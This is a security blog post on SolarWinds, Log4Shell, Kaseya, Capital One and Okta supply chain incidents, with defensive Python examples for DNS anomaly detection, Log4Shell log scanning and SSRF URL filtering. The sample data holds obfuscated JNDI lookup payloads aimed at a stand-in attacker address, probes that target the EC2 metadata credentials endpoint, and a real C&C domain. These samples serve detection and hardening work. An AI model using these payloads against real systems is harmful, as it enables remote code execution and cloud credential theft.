This blog was written by an independent guest blogger.
Over the past several years, attackers have gone from targeting companies directly to also targeting their supply chains. Software supply chains are a particular weak point, and an increasingly common route to valuable business information. Gartner has predicted that by 2025, 45% of organizations will have experienced an attack on their software supply chain.
Supply chain attacks take various forms, from malicious code injected into enterprise software to vulnerabilities in software your company uses. To mitigate the risk, companies must understand the methods used to carry out these attacks and identify their own blind spots.
This article looks at five recent software supply chain attacks and how third-party partners can pose a security risk to your company. We make recommendations for securing your business against supply chain attacks and for detecting threats early enough to respond before they take down your enterprise.
What is a software supply chain attack?
The US Cybersecurity and Infrastructure Security Agency (CISA) defines a software supply chain attack as one that “occurs when a cyber threat actor infiltrates a software vendor’s network and employs malicious code to compromise the software before the vendor sends it to their customers. The compromised software then compromises the customer’s data or system.”
A software supply chain includes every company you purchase software from, every open-source project and public repository your developers pull code from, and every service organization that has access to your data. Each of these suppliers adds to your attack surface, and together they make it far larger than your own footprint.
Software supply chain attacks are particularly dangerous because the supply chain acts as an amplifier: compromising one vendor can give attackers a path into every one of that vendor’s customers, far greater reach than attacking a single company directly.
Two primary reasons contribute to the danger, according to CISA:
- Third-party software products usually require privileged access;
- They often require frequent communication between the vendor’s own network and the vendor’s software on customer networks.
Attackers use that privileged access, and the trusted network channel that carries it, as their initial foothold. Depending on the level of access available, they can then reach many devices and tiers of an organization. Some industries, such as healthcare, are particularly exposed because they hold large volumes of patient data subject to strict regulation.
Five major supply chain attacks
In recent memory, software supply chain attacks have drawn increased public attention because of how damaging they can be to a company and its reputation. The Log4j vulnerability demonstrated how much exposure companies inherit from the third-party code they depend on. Other high-profile incidents, such as the SolarWinds SUNBURST attack and the Kaseya VSA (REvil) attack, were equally painful reminders of how damaging supply chain attacks can be.
The SolarWinds SUNBURST backdoor
On December 13th, 2020, the SUNBURST backdoor was first disclosed. The attackers had compromised SolarWinds’ build process and inserted the backdoor into digitally signed updates of the popular Orion IT monitoring and management suite, which SolarWinds then distributed to customers through its normal update channel.
The backdoor ran on servers hosting the Orion software. The US Treasury and Commerce Departments were among the first publicly identified victims, and Fortune 500 companies, telecommunications providers, other government agencies, and universities were also reported as potentially affected.
In this case, the primary blind spot was the application servers themselves and their software update pathway. The malicious update carried a valid SolarWinds signature, so signature verification offered no protection; what defenders could observe was the server’s behavior after the update, in particular its outbound network connections.
Reports indicated that the command and control (C&C) domain avsvmcloud[.]com was registered as early as February 26th, 2020. Like other supply chain implants, SUNBURST also used a period of dormancy: after installation it waited up to about two weeks before its first beacon, so that the new outbound traffic no longer lined up in time with the update that introduced it and was less likely to be attributed to that update.
A further concern is that SUNBURST sat on dedicated monitoring servers. Such servers hold privileged credentials to much of the estate, are frequently excluded from endpoint security tooling for performance or compatibility reasons, and generate enough legitimate network traffic that one more outbound connection is easy to miss. Preventing SUNBURST-style attacks therefore requires active monitoring at all levels of a company’s network, servers included, with attention to what they connect to and when.
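One concrete way to implement that monitoring, as an added example that is not part of the original article or of any SolarWinds tooling: a first-seen-domain check over DNS query logs from servers. It compares the registered domains each watched server resolved during a baseline window against a later window and alerts on anything new. The log format, host names and the subdomain label under avsvmcloud[.]com are constructed for the example; avsvmcloud.com itself is the C&C domain named above.

```python
import re
from collections import defaultdict

# Constructed DNS query log lines (not real telemetry): one query per line,
# in a simple key=value format emitted by an imaginary resolver.
BASELINE_LOG = """
2020-05-01T02:10:11Z host=orion01 qname=api.solarwinds.com qtype=A
2020-05-01T02:10:12Z host=orion01 qname=wsus.corp.example qtype=A
2020-05-02T03:00:07Z host=orion01 qname=0.pool.ntp.org qtype=A
2020-05-03T09:15:44Z host=wks-042 qname=www.example.org qtype=A
2020-05-04T11:05:03Z host=db01 qname=wsus.corp.example qtype=A
2020-05-04T11:05:09Z host=db01 qname=1.pool.ntp.org qtype=A
""".strip().splitlines()

# Later window. The avsvmcloud.com subdomain label is made up; the parent
# domain is the C&C domain the SUNBURST reporting named.
DETECT_LOG = """
2020-06-14T03:14:07Z host=orion01 qname=print01.corp.example qtype=A
2020-06-14T03:14:09Z host=orion01 qname=k3f0dn8q1m2x7c4p9a6b.appsync-api.eu-west-1.avsvmcloud.com qtype=A
2020-06-14T08:22:10Z host=wks-042 qname=cdn.newsite.example qtype=A
2020-06-14T09:00:00Z host=db01 qname=0.pool.ntp.org qtype=A
""".strip().splitlines()

# Servers whose egress is sensitive: they hold privileged credentials and
# should rarely talk to destinations they have never contacted before.
WATCH_HOSTS = {"orion01", "db01"}

LINE = re.compile(r"host=(?P<host>\S+)\s+qname=(?P<qname>\S+)")


def registered_domain(qname: str) -> str:
    """Collapse a query name to its last two labels.

    Simplification for the example: production code should use the Public
    Suffix List so that names like foo.co.uk do not collapse to co.uk.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def domains_by_host(lines):
    """Map host -> set of registered domains that host queried."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE.search(line)
        if m:
            seen[m.group("host")].add(registered_domain(m.group("qname")))
    return seen


def first_seen_domains(baseline_lines, detect_lines, watch_hosts):
    """Return (host, domain) pairs where a watched host resolved a registered
    domain that never appeared in that host's baseline window."""
    baseline = domains_by_host(baseline_lines)
    current = domains_by_host(detect_lines)
    alerts = []
    for host in sorted(watch_hosts):
        new = current.get(host, set()) - baseline.get(host, set())
        for domain in sorted(new):
            alerts.append((host, domain))
    return alerts


if __name__ == "__main__":
    for host, domain in first_seen_domains(BASELINE_LOG, DETECT_LOG, WATCH_HOSTS):
        print(f"ALERT {host} resolved never-before-seen domain {domain}")
```

Two design points follow directly from SUNBURST. The baseline is kept per host and only for the class of servers that should rarely contact new destinations, because a monitoring server’s legitimate internal chatter would otherwise drown the signal (print01.corp.example above is new as a name but not as a domain, so it does not alert). And because the implant waited up to two weeks before beaconing, the detection window after an update must extend well past the change window; a check that only watches the day of the update would have seen nothing.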
Log4Shell / Log4j Exploit and Open Source Software vulnerabilities
Another concerning class of risk is vulnerabilities in open source software. Log4Shell (CVE-2021-44228) was a vulnerability in Apache Log4j 2, a Java logging library embedded in a vast number of applications and appliances. If an attacker-controlled string reached a log statement, Log4j’s message lookup feature evaluated any ${jndi:...} expression in it and performed a JNDI lookup against an attacker-chosen LDAP or RMI server, whose response could lead to remote code execution with the privileges of the logging application, up to full control of the server. It was exploited in the wild before fixed releases were widely deployed, which is what made it a zero-day. The often-quoted figure of three billion devices running Java overstates the exposure; what mattered was whether an application bundled a Log4j 2 release older than the fixes shipped in December 2021 (2.17.1 for Java 8, with backports for older Java versions), and because the library ships inside other software, many organizations did not know they were running it at all.
Resolving Log4Shell and similar vulnerabilities requires a complete inventory not only of the devices on your network but of the software components running on them, down to the library level, because Log4j is bundled inside applications rather than installed as a visible package. It means using a system for discovering devices and the software they run, monitoring for Log4Shell exploitation attempts, and patching affected software as quickly as possible.
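The monitoring step can be made concrete. The following is an added example, not code from the original article or from the Log4j project: it scans web-server access log lines for Log4Shell lookup strings, first undoing URL-encoding and then the nested ${lower:..}, ${upper:..} and ${..:-default} lookups attackers used to keep the literal text jndi out of their requests. The log lines are constructed; the addresses are from documentation ranges.

```python
import re
from urllib.parse import unquote

# Constructed web-server access log lines (not real traffic). The last quoted
# field is the User-Agent, a favourite place to plant the lookup string because
# many applications log it verbatim.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7:1099/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/d}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:06 +0000] "GET /price?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fe%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

# An innermost lookup: ${...} whose body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The thing we are hunting, with its JNDI scheme (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve_static(body: str):
    """Statically evaluate the lookup forms used to hide 'jndi'.

    Returns replacement text, or None when the lookup cannot be resolved
    without the target's runtime (for example ${date:yyyy}).
    """
    if ":-" in body:                          # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if not sep:
        return None
    if prefix.lower() == "lower":             # ${lower:J} -> j
        return value.lower()
    if prefix.lower() == "upper":             # ${upper:n} -> N
        return value.upper()
    return None


def _substitute(match):
    body = match.group(1)
    if body.lower().startswith("jndi:"):      # never rewrite the lookup we hunt
        return match.group(0)
    resolved = _resolve_static(body)
    return match.group(0) if resolved is None else resolved


def normalize(text: str, max_passes: int = 16) -> str:
    """URL-decode, then collapse nested lookups from the inside out until
    nothing changes, so ${${lower:j}ndi:...} becomes ${jndi:...}."""
    for _ in range(3):                        # peel up to three layers of %-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_passes):
        rewritten = INNER_LOOKUP.sub(_substitute, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def find_log4shell(lines):
    """Return (line_number, jndi_scheme, normalized_line) for every line that
    contains a JNDI lookup once obfuscation has been removed."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize(line)
        m = JNDI_LOOKUP.search(normalized)
        if m:
            hits.append((number, m.group(1).lower(), normalized))
    return hits


if __name__ == "__main__":
    for number, scheme, normalized in find_log4shell(SAMPLE_LOGS):
        print(f"line {number}: jndi:{scheme} lookup -> {normalized}")
```

Resolving lookups from the inside out matters because a plain search for ${jndi: misses every obfuscated variant, while a search for ${ alone fires on harmless lookups such as ${date:yyyy}. Detection of this kind tells you that you are being probed, not whether a probe landed, so it belongs alongside the inventory step: locate every copy of log4j-core, including copies nested inside application jars and appliances, and upgrade to a fixed release. Where an upgrade is impossible, Apache’s documented fallback is to remove the JndiLookup class from the jar.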
Kaseya VSA attack and Managed Services and Software Ransomware
The primary purpose of a supply chain attack is to exploit a supplier’s weakness in order to reach downstream targets. That is exactly what the REvil ransomware group did in July 2021 when it hijacked Kaseya VSA, a remote monitoring and management platform that managed service providers use to administer their customers’ IT systems.
By exploiting a vulnerability in internet-facing, on-premises Kaseya VSA servers, REvil used the platform’s own software-deployment capability to push ransomware to the endpoints it managed, reaching up to 1,500 downstream businesses.
In this case, the blind spots were internet-facing devices, devices under remote management, and the communication pathways between the managed service provider and its customers. The underlying exposure is structural: a remote management platform holds administrative control over every endpoint it manages, so whoever controls the platform controls them all. Practical defenses are to monitor the channels the managed service provider uses, to treat an unexpected mass deployment or script-execution job from the management platform as an incident rather than routine maintenance, and to use behavioral analysis on endpoints to catch and stop ransomware activity.
The Capital One attack and cloud infrastructure security flaws
Not all attacks are well-coordinated endeavors performed by elite hacking groups. In 2019 Capital One disclosed an extensive data breach carried out by a single individual, a former Amazon Web Services (AWS) employee. A misconfigured web application firewall running in Capital One’s own AWS environment allowed requests to be relayed to the EC2 instance metadata service, which handed back temporary credentials for an IAM role; that role had permission to list and read the S3 buckets holding data on roughly 100 million US credit card applicants, plus about 6 million in Canada. The breach was widely reported as a warning about the dangers of cloud infrastructure, though the flaw was in how the infrastructure was configured rather than in the cloud platform itself.
The main blind spot here is the customer’s half of the shared responsibility model. Using a cloud provider means trusting the provider to secure the underlying platform, but configuration of your own instances, firewall rules, and IAM permissions remains your job, and in this case AWS was not compromised; Capital One’s configuration was. Defending against attacks of this kind means applying least privilege to the roles your workloads run under, behavioral monitoring of your services so that an unusual principal enumerating and copying dozens of storage buckets stands out, and securing the edge of your network so that internet-facing components cannot be turned into a bridge to internal services.
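The mechanism behind this breach, a server-side component that forwards requests to whatever URL it is handed, is worth seeing beside its fix. The following is an added example, not Capital One’s or AWS’s code: a naive URL check of the kind that lets an external request reach the EC2 instance metadata service at 169.254.169.254, next to a hardened check that allow-lists destination hosts and rejects literal non-public addresses, including the userinfo, IPv6 and integer-encoded address tricks used to slip past weaker filters. The allow-listed host names and the probe URLs are constructed; the metadata address is the real one.

```python
import ipaddress
from urllib.parse import urlsplit

# Destinations this service is actually meant to reach. Constructed placeholder
# names; a real deployment lists its own partner APIs.
ALLOWED_HOSTS = frozenset({"api.partner.example", "rates.vendor.example"})

# Constructed probes of the kind an attacker sends to a URL-fetching feature.
# 169.254.169.254 is the real EC2 instance metadata address; 2852039166 is the
# same address as a bare integer, which many resolvers accept.
PROBES = [
    "https://api.partner.example/v1/rates",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://api.partner.example@169.254.169.254/latest/meta-data/",
    "http://[fd00::a9fe:a9fe]/latest/meta-data/",
    "http://127.0.0.1:8500/v1/kv/",
    "http://2852039166/latest/meta-data/",
    "ftp://api.partner.example/",
]


def naive_allows(url: str) -> bool:
    """The 'before': anything that looks like an http(s) URL gets fetched.

    A proxy, WAF or webhook handler that behaves like this is what allows an
    external request to be relayed to the metadata service.
    """
    return url.startswith(("http://", "https://"))


def hardened_allows(url: str, allowed_hosts=ALLOWED_HOSTS):
    """The 'after': returns (allowed, reason).

    Rules: http(s) only; the host the URL will actually connect to must be an
    allow-listed name; every literal IP address is refused, which covers
    link-local (169.254.0.0/16, home of the metadata service), loopback,
    RFC 1918 and IPv6 ULA ranges. Integer or hex encodings such as
    2852039166 are not parsed as addresses here, but they are not
    allow-listed names either, so they are refused as unknown hosts.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname          # strips userinfo, brackets and port
    if not host:
        return False, "no host in URL"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        kind = "public" if addr.is_global else "non-public"
        return False, f"literal {kind} address {addr} refused; names only"
    if host.lower() not in allowed_hosts:
        return False, f"host {host!r} not allow-listed"
    return True, "ok"


def evaluate(urls):
    """Side-by-side verdicts: (url, naive verdict, hardened verdict, reason)."""
    rows = []
    for url in urls:
        ok, reason = hardened_allows(url)
        rows.append((url, naive_allows(url), ok, reason))
    return rows


if __name__ == "__main__":
    for url, naive, hardened, reason in evaluate(PROBES):
        print(f"{'naive:OK ' if naive else 'naive:NO '} {'hard:OK ' if hardened else 'hard:NO '} {url}  ({reason})")
```

Two caveats. Host allow-listing only helps if the connection is made to the address that was validated; a resolver that returns a public address once and 169.254.169.254 the next time (DNS rebinding) defeats a check that validates, then resolves again, so resolve once and connect to that address. And an application-side filter is one layer of several: on the AWS side, requiring IMDSv2 session tokens (aws ec2 modify-instance-metadata-options --http-tokens required) stops a one-shot GET relayed through a request-forwarding bug from retrieving role credentials, and scoping the instance role to the buckets it actually needs limits what stolen credentials can reach.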
Bring Your Own Device (BYOD) vulnerabilities and vendor devices
In March 2022, the identity provider Okta revealed that one of its customer-support subcontractors, Sitel, had been breached in January through the laptop of a support engineer, which the attackers reached remotely. The impact was limited: by Okta’s final assessment the attacker controlled that single workstation for a short window and viewed information on two Okta customer tenants through Sitel’s support tooling, without making any configuration changes or resetting any credentials. Nonetheless, subcontractor devices and bring your own device policies represent an additional attack vector.
Every unmanaged or unsanctioned device that joins your network adds to the attack surface, and companies often have no record of which devices are connected, what software they run, or what protection they have against malware. Reducing this risk starts with an asset inventory and with limiting what unmanaged devices can reach. Network monitoring and behavioral analysis then provide the means to detect and stop attacks that originate from them.